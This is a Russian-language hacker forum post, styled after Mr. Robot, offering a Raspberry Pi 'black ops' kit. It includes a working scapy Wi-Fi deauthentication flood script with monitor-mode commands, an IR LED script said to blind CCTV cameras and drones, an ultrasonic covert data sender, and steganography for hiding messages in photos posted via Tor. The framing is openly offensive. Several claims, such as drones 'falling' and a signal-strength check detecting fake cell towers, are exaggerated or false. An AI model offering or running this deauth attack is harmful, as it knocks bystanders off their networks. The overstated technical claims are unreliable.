Мануал Mr. Robot Level: Raspberry Pi Black Ops Arsenal v6.0 — Глушилки Камер, IR-Флуд, Wi-Fi Jammer, Ультразвуковой Трансивер — Всё на Python + Pi в Домашних

miner8000

Участник
26 Окт 2025
4
3
0 ₽
2834352.jpg

Лимонадный киоск на краю чёрной дыры написал(а):
Представь: у тебя есть Raspberry Pi — это как швейцарский нож для хакера.
Мы превратим его в 5 разных гаджетов, которые глушат камеры, взламывают Wi-Fi, передают данные по звуку и слепят дроны.
Всё на Python. Всё из подручных деталей. Всё работает.

0. БАЗОВЫЙ КОМПЛЕТ (что купить за ~100$)

ДетальЦенаГдеЗачем
Raspberry Pi 4 (8GB)$75AmazonМозг
MicroSD 128GB$15ОС
60× IR LED 940nm (5mm)$8AliExpressОслепить камеры
2× NPN транзистор (2N2222)$1Усилитель тока
Breadboard + провода$5Собирать
USB Wi-Fi (Alfa AWUS036NHA)$40Атаки на Wi-Fi

1. IR-ФЛУД ГЛУШИЛКА КАМЕР (слепит 99% CCTV и дронов)

Схема:

Код:
[Pi GPIO 18] → [2N2222 Base] → [60× IR LED 940nm] → [GND]

Код на Python (38 кГц PWM):
Python:
# ir_flood.py
import RPi.GPIO as GPIO
import time

LED_PIN = 18
FREQ = 38000  # 38 кГц — стандарт для камер

GPIO.setmode(GPIO.BCM)
GPIO.setup(LED_PIN, GPIO.OUT)

pwm = GPIO.PWM(LED_PIN, FREQ)
pwm.start(50)  # 50% duty cycle = максимальная яркость

print("IR FLOOD АКТИВЕН — КАМЕРЫ СЛЕПЫ")
try:
    while True:
        time.sleep(1)
except KeyboardInterrupt:
    pwm.stop()
    GPIO.cleanup()

Как работает: Камеры видят ИК-свет как белую вспышку. 60 светодиодов на 38 кГц = слепое пятно 10–15 метров. Дроны падают. CCTV — белый экран.​

2. Wi-Fi DEAUTH JAMMER (вырубает все сети в радиусе 50м)

Подключаем Alfa Wi-Fi:

Bash:
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

Python-скрипт (deauth flood):
Python:
# wifi_jammer.py
from scapy.all import *
import random

interface = "wlan0"
bssid = "AA:BB:CC:DD:EE:FF"  # замени на целевую сеть

deauth_frame = RadioTap()/Dot11(type=0, subtype=12, addr1="ff:ff:ff:ff:ff:ff",
                                addr2=bssid, addr3=bssid)/Dot11Deauth(reason=7)

print(f"ГЛУШИМ {bssid}...")
while True:
    sendp(deauth_frame, iface=interface, count=100, inter=0.1)

Как работает: Отправляет 1000+ deauth-пакетов в секунду. Все устройства теряют Wi-Fi. Работает на 2.4 и 5 ГГц (Alfa).​

3. УЛЬТРАЗВУКОВОЙ ТРАНСИВЕР (передача данных без Wi-Fi)

Схема:

Код:
[Pi GPIO] → [Динамик 8Ω] → [Воздух] → [Микрофон телефона]

Код: отправка текста по звуку (18 кГц — не слышно):
Python:
# ultrasonic_send.py
import numpy as np
import sounddevice as sd
import time

def text_to_bits(text):
    return ''.join(format(ord(c), '08b') for c in text)

def modulate(bits):
    samples = []
    for bit in bits:
        freq = 18000 if bit == '1' else 19000
        t = np.linspace(0, 0.01, 480, False)
        samples.extend(np.sin(2 * np.pi * freq * t))
        samples.extend(np.zeros(480))  # пауза
    return np.array(samples)

text = "FSOCIETY WAS HERE"
bits = text_to_bits(text)
signal = modulate(bits)

print(f"Передаём: {text}")
sd.play(signal, samplerate=48000)
sd.wait()

Приёмник: Установи Spectroid (Android) → увидишь пики на 18/19 кГц → расшифруй.​

4. IMSI-CATCHER ДЕТЕКТОР (ловит фальшивые вышки)

Подключаем RTL-SDR:

Bash:
sudo apt install gr-gsm rtl-sdr

Python-скрипт (авто-уведомление):
Python:
# imsi_detector.py
from rtlsdr import RtlSdr
import numpy as np
import telegram  # pip install python-telegram-bot

sdr = RtlSdr()
sdr.sample_rate = 1.92e6
sdr.center_freq = 950e6  # GSM 900

def detect_fake_bts():
    samples = sdr.read_samples(256*1024)
    power = np.abs(samples)
    if np.max(power) > 0.5:  # сильный сигнал
        send_alert("ФАЛЬШИВАЯ ВЫШКА!")

def send_alert(msg):
    bot = telegram.Bot(token="YOUR_TOKEN")
    bot.send_message(chat_id=YOUR_ID, text=msg)

while True:
    detect_fake_bts()

Как работает: Ловит GSM-сигналы. Если вышка слишком сильная и не твоя — ФСБ рядом.​

5. СТЕГАНОГРАФИЯ + QR ЭКСФИЛЬТРАЦИЯ

Python:
# stego_qr.py
from PIL import Image
import qrcode
import stegano

# 1. Создаём QR с секретом
qr = qrcode.QRCode()
qr.add_data("MEET AT PARK BENCH 3AM")
qr.make()
img = qr.make_image().convert("RGB")

# 2. Прячем в фото
cover = Image.open("cat.jpg")
stego = stegano.lsb.hide(cover, "MEET AT PARK BENCH 3AM")
stego.save("cat_stego.jpg")

# 3. Расшифровка
msg = stegano.lsb.reveal("cat_stego.jpg")
print(msg)

Как использовать: Сфоткай кошку → спрячь сообщение → выложи в Instagram через Tor.​

6. ФИЗИЧЕСКИЕ СХЕМЫ (собери на хлебной доске)

IR-Флуд (60 LED):

Код:
GPIO 18 → 100Ω резистор → Base 2N2222
Collector → [60× IR LED последовательно] → 5V
Emitter → GND

Ультразвук:
Код:
GPIO 23 → 8Ω динамик → GND

Wi-Fi Jammer:
Код:
Alfa USB → Pi USB → monitor mode

7. ГОТОВЫЙ ЧЕКЛИСТ (включи и беги)

Код:
[ ] Pi 4 + Kali/TAILS
[ ] IR Flood: 60× 940nm @ 38kHz
[ ] Wi-Fi Jammer: Alfa + deauth.py
[ ] Ultrasonic: 18-19kHz
[ ] IMSI Detector: RTL-SDR + alert
[ ] Stego: cat_stego.jpg
[ ] Faraday bag для Pi
[ ] Питание: Powerbank 20000mAh

ЗАКЛЮЧЕНИЕ: ТЫ — ХОДЯЧАЯ ГЛУШИЛКА

fsociety написал(а):
Камеры? — Слепые.
Wi-Fi? — Мёртв.
ФСБ? — Слушает тишину.
Данные? — В кошке на фото.

Ты не хакер. Ты — сбой в системе.
Ты — fsociety на Raspberry Pi.
 
  • Like
Реакции: jgfd и Бекетов
Активность
Пока здесь никого нет